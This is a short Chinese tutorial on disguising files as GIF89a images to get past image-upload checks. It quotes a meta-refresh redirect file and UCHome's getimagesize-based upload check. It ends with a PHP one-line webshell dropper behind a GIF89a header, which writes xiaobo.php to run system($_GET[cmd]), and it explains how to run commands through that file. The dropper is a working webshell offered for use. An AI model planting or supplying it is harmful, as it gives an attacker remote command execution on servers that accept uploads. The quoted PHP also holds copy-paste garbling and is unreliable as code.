GIF89a图片头文件欺骗

一 GIF89a图片头文件欺骗
1、什么是GIF89a


    一个GIF89a图形文件就是一个根据图形交换格式（GIF）89a版（1989年7 月发行）进行格式化之后的图形。在GIF89a之前还有87a版（1987年5月发行），但在Web上所见到的大多数图形都是以89a版的格式创建的。 89a版的一个最主要的优势就是可以创建动态图像，例如创建一个旋转的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是，一个动态GIF是一个以GIF89a格式存储的文件，在一个这样的文件里包含的是一组以指定顺序呈现的图片。


2、GIG89a实例


用记事本编写一下内容，然后修改后缀变成图片


view plaincopy to clipboardprint?
GIF89a   
<head>  
<meta http-equiv = "refresh" content = "1; url=http://www.×××.com/" />  
</head>  
GIF89a
<head>
<meta http-equiv = "refresh" content = "1; url=http://www.×××.com/" />
</head> 。 当单独查看此文件时，会出现GIF89a，然后跳转到指定的网页（ie6和ie7下，Firefox下不可以）。


3、php下检测（使用getimagesize函数无法判断其图片是无效的）


uchome2.0的处理（1.5有此漏洞）：view plaincopy to clipboardprint?
//检查是否图片   
    if(function_exists(＇getimagesize＇)) {   
        $tmp_imagesize = @getimagesize($new_name);   
        list($tmp_width, $tmp_height, $tmp_type) = (array)$tmp_imagesize;   
        $tmp_size = $tmp_width × $tmp_height;   
        if($tmp_size > 16777216 || $tmp_size < 4 || emptyempty($tmp_type) || strpos($tmp_imagesize[＇mime＇], ＇flash＇) > 0) {   
            @unlink($new_name);   
            return cplang(＇only_allows_upload_file_types＇);   
        }   
    }  
//检查是否图片
 if(function_exists(＇getimagesize＇)) {
  $tmp_imagesize = @getimagesize($new_name);
  list($tmp_width, $tmp_height, $tmp_type) = (array)$tmp_imagesize;
  $tmp_size = $tmp_width × $tmp_height;
  if($tmp_size > 16777216 || $tmp_size < 4 || empty($tmp_type) || strpos($tmp_imagesize[＇mime＇], ＇flash＇) > 0) {
   @unlink($new_name);
   return cplang(＇only_allows_upload_file_types＇);
  }
 

 }

2 一个php的一句话木马:

GIF89a 
<?fputs(fopen("xiaobo.php","w"),"<?system(\$_GET[cmd]);?>")?>

上面的代码上传会 会生成一个教xiaobo.php文件  然后可以使用xiaobo.php?cmd=linux命令来执行脚本